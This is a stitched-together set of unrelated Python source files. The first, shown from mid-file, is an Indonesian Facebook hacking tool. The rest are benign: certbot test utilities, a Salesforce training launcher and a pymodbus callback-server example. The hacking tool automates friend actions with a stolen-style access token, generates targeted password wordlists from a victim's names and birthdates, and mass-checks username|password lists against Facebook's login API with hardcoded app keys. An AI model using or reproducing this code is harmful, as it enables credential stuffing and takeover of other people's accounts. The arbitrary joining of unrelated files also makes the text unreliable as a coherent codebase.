r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
util.py
|
"""Test utilities.
.. warning:: This module is not part of the public API.
"""
import multiprocessing
import os
import pkg_resources
import shutil
import tempfile
import unittest
import sys
import warnings
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import mock
import OpenSSL
import josepy as jose
import six
from six.moves import reload_module # pylint: disable=import-error
from certbot import constants
from certbot import interfaces
from certbot import storage
from certbot import util
from certbot import configuration
from certbot.display import util as display_util
def vector_path(*names):
"""Path to a test vector."""
return pkg_resources.resource_filename(
__name__, os.path.join('testdata', *names))
def load_vector(*names):
"""Load contents of a test vector."""
# luckily, resource_string opens file in binary mode
data = pkg_resources.resource_string(
__name__, os.path.join('testdata', *names))
# Try to convert CRLF to LF when the data is text
try:
return data.decode().replace('\r\n', '\n').encode()
except ValueError:
# Failed to process the file with standard encoding.
# Most likely not a text file, return its bytes untouched.
return data
def _guess_loader(filename, loader_pem, loader_der):
_, ext = os.path.splitext(filename)
if ext.lower() == '.pem':
return loader_pem
elif ext.lower() == '.der':
return loader_der
else: # pragma: no cover
raise ValueError("Loader could not be recognized based on extension")
def load_cert(*names):
"""Load certificate."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate(loader, load_vector(*names))
def load_csr(*names):
"""Load certificate request."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate_request(loader, load_vector(*names))
def load_comparable_csr(*names):
"""Load ComparableX509 certificate request."""
return jose.ComparableX509(load_csr(*names))
def load_rsa_private_key(*names):
"""Load RSA private key."""
loader = _guess_loader(names[-1], serialization.load_pem_private_key,
serialization.load_der_private_key)
return jose.ComparableRSAKey(loader(
load_vector(*names), password=None, backend=default_backend()))
def load_pyopenssl_private_key(*names):
"""Load pyOpenSSL private key."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_privatekey(loader, load_vector(*names))
def skip_unless(condition, reason): # pragma: no cover
"""Skip tests unless a condition holds.
This implements the basic functionality of unittest.skipUnless
which is only available on Python 2.7+.
:param bool condition: If ``False``, the test will be skipped
:param str reason: the reason for skipping the test
:rtype: callable
:returns: decorator that hides tests unless condition is ``True``
"""
if hasattr(unittest, "skipUnless"):
return unittest.skipUnless(condition, reason)
elif condition:
return lambda cls: cls
else:
return lambda cls: None
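# Illustrative usage (not part of the original module): like
# unittest.skipUnless, the returned decorator can be applied to a TestCase
# class or method, e.g.
#
#     @skip_unless(sys.platform.startswith('linux'), 'requires Linux')
#     class LinuxOnlyTest(unittest.TestCase):
#         ...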
def make_lineage(config_dir, testfile):
"""Creates a lineage defined by testfile.
This creates the archive, live, and renewal directories if
necessary and creates a simple lineage.
:param str config_dir: path to the configuration directory
:param str testfile: configuration file to base the lineage on
:returns: path to the renewal conf file for the created lineage
:rtype: str
"""
lineage_name = testfile[:-len('.conf')]
conf_dir = os.path.join(
config_dir, constants.RENEWAL_CONFIGS_DIR)
archive_dir = os.path.join(
config_dir, constants.ARCHIVE_DIR, lineage_name)
live_dir = os.path.join(
config_dir, constants.LIVE_DIR, lineage_name)
for directory in (archive_dir, conf_dir, live_dir,):
if not os.path.exists(directory):
os.makedirs(directory)
sample_archive = vector_path('sample-archive')
for kind in os.listdir(sample_archive):
shutil.copyfile(os.path.join(sample_archive, kind),
os.path.join(archive_dir, kind))
for kind in storage.ALL_FOUR:
os.symlink(os.path.join(archive_dir, '{0}1.pem'.format(kind)),
os.path.join(live_dir, '{0}.pem'.format(kind)))
conf_path = os.path.join(config_dir, conf_dir, testfile)
with open(vector_path(testfile)) as src:
with open(conf_path, 'w') as dst:
dst.writelines(
line.replace('MAGICDIR', config_dir) for line in src)
return conf_path
def patch_get_utility(target='zope.component.getUtility'):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it
also asserts that methods are called with valid arguments.
:param str target: path to patch
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
return mock.patch(target, new_callable=_create_get_utility_mock)
def patch_get_utility_with_stdout(target='zope.component.getUtility',
stdout=None):
"""Patch zope.component.getUtility to use a special mock IDisplay.
The mock IDisplay works like a regular mock object, except it
also asserts that methods are called with valid arguments.
The `message` argument passed to the IDisplay methods is passed to
stdout's write method.
:param str target: path to patch
:param object stdout: object to write standard output to; it is
expected to have a `write` method
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
stdout = stdout if stdout else six.StringIO()
freezable_mock = _create_get_utility_mock_with_stdout(stdout)
return mock.patch(target, new=freezable_mock)
class FreezableMock(object):
"""Mock object with the ability to freeze attributes.
This class works like a regular mock.MagicMock object, except
attributes and behavior set before the object is frozen cannot
be changed during tests.
If a func argument is provided to the constructor, this function
is called first when an instance of FreezableMock is called,
followed by the usual behavior defined by MagicMock. The return
value of func is ignored.
"""
def __init__(self, frozen=False, func=None, return_value=mock.sentinel.DEFAULT):
self._frozen_set = set() if frozen else set(('freeze',))
self._func = func
self._mock = mock.MagicMock()
if return_value != mock.sentinel.DEFAULT:
self.return_value = return_value
self._frozen = frozen
def freeze(self):
"""Freeze object preventing further changes."""
self._frozen = True
def __call__(self, *args, **kwargs):
if self._func is not None:
self._func(*args, **kwargs)
return self._mock(*args, **kwargs)
def __getattribute__(self, name):
if name == '_frozen':
try:
return object.__getattribute__(self, name)
except AttributeError:
return False
elif name in ('return_value', 'side_effect',):
return getattr(object.__getattribute__(self, '_mock'), name)
elif name == '_frozen_set' or name in self._frozen_set:
return object.__getattribute__(self, name)
else:
return getattr(object.__getattribute__(self, '_mock'), name)
def __setattr__(self, name, value):
""" Before it is frozen, attributes are set on the FreezableMock
instance and added to the _frozen_set. Attributes in the _frozen_set
cannot be changed after the FreezableMock is frozen. In this case,
they are set on the underlying _mock.
In cases of return_value and side_effect, these attributes are always
passed through to the instance's _mock and added to the _frozen_set
before the object is frozen.
"""
if self._frozen:
if name in self._frozen_set:
raise AttributeError('Cannot change frozen attribute ' + name)
else:
return setattr(self._mock, name, value)
if name != '_frozen_set':
self._frozen_set.add(name)
if name in ('return_value', 'side_effect'):
return setattr(self._mock, name, value)
else:
return object.__setattr__(self, name, value)
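# Illustrative sketch (not part of the original module): attributes set before
# freeze() become locked, while calls still delegate to the inner MagicMock.
#
#     display = FreezableMock()
#     display.notification = FreezableMock(frozen=True)
#     display.freeze()
#     display.notification('msg')   # fine: delegated to the underlying mock
#     display.notification = None   # AttributeError: frozen attribute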
def _create_get_utility_mock():
display = FreezableMock()
for name in interfaces.IDisplay.names(): # pylint: disable=no-member
if name != 'notification':
frozen_mock = FreezableMock(frozen=True, func=_assert_valid_call)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _create_get_utility_mock_with_stdout(stdout):
def _write_msg(message, *unused_args, **unused_kwargs):
"""Write to message to stdout.
"""
if message:
stdout.write(message)
def mock_method(*args, **kwargs):
"""
Mock function for IDisplay methods.
"""
_assert_valid_call(args, kwargs)
_write_msg(*args, **kwargs)
display = FreezableMock()
for name in interfaces.IDisplay.names(): # pylint: disable=no-member
if name == 'notification':
frozen_mock = FreezableMock(frozen=True,
func=_write_msg)
setattr(display, name, frozen_mock)
else:
frozen_mock = FreezableMock(frozen=True,
func=mock_method)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _assert_valid_call(*args, **kwargs):
assert_args = [args[0] if args else kwargs['message']]
assert_kwargs = {}
assert_kwargs['default'] = kwargs.get('default', None)
assert_kwargs['cli_flag'] = kwargs.get('cli_flag', None)
assert_kwargs['force_interactive'] = kwargs.get('force_interactive', False)
# pylint: disable=star-args
display_util.assert_valid_call(*assert_args, **assert_kwargs)
class TempDirTestCase(unittest.TestCase):
"""Base test class which sets up and tears down a temporary directory"""
def setUp(self):
"""Execute before test"""
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
"""Execute after test"""
# Some files are not correctly closed by the time tearDown runs.
# On Windows this prevents the temporary directory from being removed.
# For now, we log these failures until proper file close handling is written.
def onerror_handler(_, path, excinfo):
"""On error handler"""
message = ('Following error occurred when deleting the tempdir {0}'
' for path {1} during tearDown process: {2}'
.format(self.tempdir, path, str(excinfo)))
warnings.warn(message)
shutil.rmtree(self.tempdir, onerror=onerror_handler)
class ConfigTestCase(TempDirTestCase):
"""Test class which sets up a NamespaceConfig object.
"""
def setUp(self):
super(ConfigTestCase, self).setUp()
self.config = configuration.NamespaceConfig(
mock.MagicMock(**constants.CLI_DEFAULTS)
)
self.config.verb = "certonly"
self.config.config_dir = os.path.join(self.tempdir, 'config')
self.config.work_dir = os.path.join(self.tempdir, 'work')
self.config.logs_dir = os.path.join(self.tempdir, 'logs')
self.config.cert_path = constants.CLI_DEFAULTS['auth_cert_path']
self.config.fullchain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.chain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.server = "https://example.com"
def lock_and_call(func, lock_path):
"""Grab a lock for lock_path and call func.
:param callable func: object to call after acquiring the lock
:param str lock_path: path to file or directory to lock
"""
# Reload module to reset internal _LOCKS dictionary
reload_module(util)
# start child and wait for it to grab the lock
cv = multiprocessing.Condition()
cv.acquire()
child_args = (cv, lock_path,)
child = multiprocessing.Process(target=hold_lock, args=child_args)
child.start()
cv.wait()
# call func and terminate the child
func()
cv.notify()
cv.release()
child.join()
assert child.exitcode == 0
def hold_lock(cv, lock_path): # pragma: no cover
"""Acquire a file lock at lock_path and wait to release it.
:param multiprocessing.Condition cv: condition for synchronization
:param str lock_path: path to the file lock
"""
from certbot import lock
if os.path.isdir(lock_path):
my_lock = lock.lock_dir(lock_path)
else:
my_lock = lock.LockFile(lock_path)
cv.acquire()
cv.notify()
cv.wait()
my_lock.release()
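# Illustrative usage (hypothetical callable and path, not from the original
# module): run check_locked_behavior in the parent while a child process holds
# the lock on config_dir, so a test can assert how code reacts to contention.
#
#     lock_and_call(check_locked_behavior, config_dir)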
def skip_on_windows(reason):
"""Decorator to skip permanently a test on Windows. A reason is required."""
def wrapper(function):
"""Wrapped version"""
return unittest.skipIf(sys.platform == 'win32', reason)(function)
return wrapper
def broken_on_windows(function):
"""Decorator to skip temporarily a broken test on Windows."""
reason = 'Test is broken and ignored on windows but should be fixed.'
return unittest.skipIf(
sys.platform == 'win32'
and os.environ.get('SKIP_BROKEN_TESTS_ON_WINDOWS', 'true') == 'true',
reason)(function)
def temp_join(path):
"""
Return the given path joined to the tempdir path for the current platform.
E.g. 'cert' => /tmp/cert (Linux) or 'C:\\Users\\currentuser\\AppData\\Temp\\cert' (Windows).
"""
return os.path.join(tempfile.gettempdir(), path)
|
main.py
|
# Copyright (c) 2019, salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: MIT
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/MIT
if __name__ == "__main__":
import torch.multiprocessing as mp
mp.set_start_method('spawn')
import os
os.environ["OMP_NUM_THREADS"] = "1"
import time
from dist_train.utils.experiment_bookend import open_experiment
from dist_train.workers import synchronous_worker
if __name__ == '__main__':
# Interpret the arguments. Load the shared model/optimizer. Fetch the config file.
model, _, config, args = open_experiment(apply_time_machine=True)
print(' ', flush=True)
model.reset()
print(' ', flush=True)
# Create a group of workers
print('Launching the individual workers...', flush=True)
processes = []
for rank in range(args.N):
# The workers perform roll-outs and synchronize gradients
p = mp.Process(target=synchronous_worker, args=(int(rank), config, args))
p.start()
time.sleep(0.25)
processes.append(p)
for p in processes:
p.join()
|
callback-server.py
|
#!/usr/bin/env python
'''
Pymodbus Server With Callbacks
--------------------------------------------------------------------------
This is an example of adding callbacks to a running modbus server
when a value is written to it. In order for this to work, it needs
a device-mapping file.
'''
#---------------------------------------------------------------------------#
# import the modbus libraries we need
#---------------------------------------------------------------------------#
from pymodbus.server.async import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
from pymodbus.compat import iterkeys
#---------------------------------------------------------------------------#
# import the python libraries we need
#---------------------------------------------------------------------------#
from multiprocessing import Queue, Process
#---------------------------------------------------------------------------#
# configure the service logging
#---------------------------------------------------------------------------#
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
#---------------------------------------------------------------------------#
# create your custom data block with callbacks
#---------------------------------------------------------------------------#
class CallbackDataBlock(ModbusSparseDataBlock):
''' A datablock that stores the new value in memory
and passes the operation to a message queue for further
processing.
'''
def __init__(self, devices, queue):
''' :param devices: The device mapping (address -> device path)
:param queue: The queue that write operations are forwarded to
'''
self.devices = devices
self.queue = queue
values = {k:0 for k in iterkeys(devices)}
values[0xbeef] = len(values) # the number of devices
super(CallbackDataBlock, self).__init__(values)
def setValues(self, address, value):
''' Sets the requested values of the datastore
:param address: The starting address
:param value: The new value(s) to be set
'''
super(CallbackDataBlock, self).setValues(address, value)
self.queue.put((self.devices.get(address, None), value))
#---------------------------------------------------------------------------#
# define your callback process
#---------------------------------------------------------------------------#
def rescale_value(value):
''' Rescale the input value from the range
of 0..100 to -3200..3200.
:param value: The input value to scale
:returns: The rescaled value
'''
s = 1 if value >= 50 else -1
c = value if value < 50 else (value - 50)
return s * (c * 64)
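# A few worked examples of the mapping above (these follow directly from the code):
# rescale_value(0) == 0, rescale_value(25) == -1600, rescale_value(75) == 1600 and
# rescale_value(100) == 3200, so the effective output range is roughly -3136..3200.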
def device_writer(queue):
''' A worker process that processes new messages
from a queue to write to device outputs
:param queue: The queue to get new messages from
'''
while True:
device, value = queue.get()
scaled = rescale_value(value[0])
log.debug("Write(%s) = %s" % (device, value))
if not device: continue
# do any logic here to update your devices
#---------------------------------------------------------------------------#
# initialize your device map
#---------------------------------------------------------------------------#
def read_device_map(path):
''' A helper method to read the device
path to address mapping from file::
0x0001,/dev/device1
0x0002,/dev/device2
:param path: The path to the input file
:returns: The input mapping file
'''
devices = {}
with open(path, 'r') as stream:
for line in stream:
piece = line.strip().split(',')
devices[int(piece[0], 16)] = piece[1]
return devices
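# For reference, a device-mapping file in the format described above, e.g.
#   0x0001,/dev/device1
#   0x0002,/dev/device2
# makes read_device_map return {1: '/dev/device1', 2: '/dev/device2'}; the name
# "device-mapping" used below is simply the file this example expects to find.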
#---------------------------------------------------------------------------#
# initialize your data store
#---------------------------------------------------------------------------#
queue = Queue()
devices = read_device_map("device-mapping")
block = CallbackDataBlock(devices, queue)
